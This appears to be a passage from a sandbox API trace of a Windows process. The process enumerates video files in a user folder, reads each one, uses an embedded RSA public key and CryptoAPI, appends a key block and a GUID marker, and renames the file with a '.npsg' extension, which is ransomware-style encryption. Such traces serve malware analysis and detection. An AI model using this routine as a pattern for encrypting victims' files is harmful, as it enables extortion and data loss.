returned 0x3b88ef8 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8f9b8 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f10 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f40 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fa0 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f58 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0240.911] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0240.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f40 | out: hHeap=0x620000) returned 1 [0240.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f58 | out: hHeap=0x620000) returned 1 [0240.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fa0 | out: hHeap=0x620000) returned 1 [0240.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0240.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fa0 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f58 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88f40 [0240.911] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0240.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0240.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0240.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0240.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0240.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7ba60 [0240.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0240.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0240.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0240.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f58 | out: hHeap=0x620000) returned 1 [0240.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0240.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f40 | out: hHeap=0x620000) returned 1 [0240.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0240.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0240.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fa0 | out: hHeap=0x620000) returned 1 [0240.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0240.912] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0240.912] GetCurrentThreadId () returned 0x5b4 [0240.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0240.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b89f28 [0240.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0240.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a3b8 [0240.912] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0240.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0240.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0240.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0240.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.913] GetCurrentThreadId () returned 0x5b4 [0240.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33adda8 [0240.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0240.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0240.913] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0240.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0240.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0240.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0240.913] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0240.914] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x14c67, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.914] WriteFile (in: hFile=0x644, lpBuffer=0x6affc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x6affc0*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0240.914] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0240.915] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0240.915] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0240.915] CloseHandle (hObject=0x644) returned 1 [0240.917] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\dTx9f.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\dtx9f.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\dTx9f.mkv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\dtx9f.mkv.npsg")) returned 1 [0240.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8bcd0 | out: hHeap=0x620000) returned 1 [0240.918] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.918] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0240.920] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0240.920] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e616120, ftCreationTime.dwHighDateTime=0x1d5c311, ftLastAccessTime.dwLowDateTime=0x2a5e1770, ftLastAccessTime.dwHighDateTime=0x1d5b833, ftLastWriteTime.dwLowDateTime=0x2a5e1770, ftLastWriteTime.dwHighDateTime=0x1d5b833, nFileSizeHigh=0x0, nFileSizeLow=0x10876, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T54477owgqw5YJ5A9Ny.mkv", cAlternateFileName="T54477~1.MKV")) returned 1 [0240.920] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\T54477owgqw5YJ5A9Ny.mkv") returned=".mkv" [0240.920] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\dLXPSgTqJi3y2\\T54477owgqw5YJ5A9Ny.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\dlxpsgtqji3y2\\t54477owgqw5yj5a9ny.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0240.921] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=67702) returned 1 [0240.921] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0240.924] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x10850, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.924] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0240.926] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x10876, lpOverlapped=0x0) returned 1 [0240.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.927] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0240.927] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a3b8) returned 1 [0240.928] CryptCreateHash (in: hProv=0x67a3b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0240.928] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0240.928] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0240.928] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0240.928] GetLastError () returned 0x0 [0240.928] CryptDestroyHash (hHash=0x33f0408) returned 1 [0240.928] CryptReleaseContext (hProv=0x67a3b8, dwFlags=0x0) returned 1 [0240.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0240.928] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0240.928] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0240.929] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0240.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0240.929] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0240.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0240.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f58 | out: hHeap=0x620000) returned 1 [0240.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f70 | out: hHeap=0x620000) returned 1 [0240.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fb8 | out: hHeap=0x620000) returned 1 [0240.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0240.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0240.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fb8 [0240.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0240.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f70 [0240.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0240.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b88f58 [0240.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0240.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0240.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0240.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0240.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0240.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0240.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0240.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0240.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0240.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f70 | out: hHeap=0x620000) returned 1 [0240.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0240.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f58 | out: hHeap=0x620000) returned 1 [0240.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0240.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0240.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fb8 | out: hHeap=0x620000) returned 1 [0240.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0240.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0240.931] GetCurrentThreadId () returned 0x5b4 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b89fb8 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a3b8 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x340dd38 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.931] GetCurrentThreadId () returned 0x5b4 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x33adda8 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0240.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0240.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0240.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0240.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fb8 [0240.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f58 [0240.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0240.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0240.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0240.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0240.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0240.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f70 [0240.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0240.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0240.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0240.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f40 [0240.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0240.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fd0 [0240.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0240.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0240.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88fa0 [0240.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0240.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b88f88 [0240.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88fe8 [0240.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f88 | out: hHeap=0x620000) returned 1 [0240.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f88 [0240.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fa0 | out: hHeap=0x620000) returned 1 [0240.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0240.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0240.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0240.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0240.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0240.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88f58 | out: hHeap=0x620000) returned 1 [0240.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b88f58 [0240.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0240.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0240.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fb8 | out: hHeap=0x620000) returned 1 [0240.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0240.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b88fe8 | out: hHeap=0x620000) returned 1 [0240.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b947f8 [0240.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0240.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0240.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0240.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bb78 [0240.935] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x10876, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0240.935] WriteFile (in: hFile=0x644, lpBuffer=0x6affc0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x6affc0*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0240.935] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0240.935] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0240.936] CloseHandle (hObject=0x644) returned 1 [0240.937] 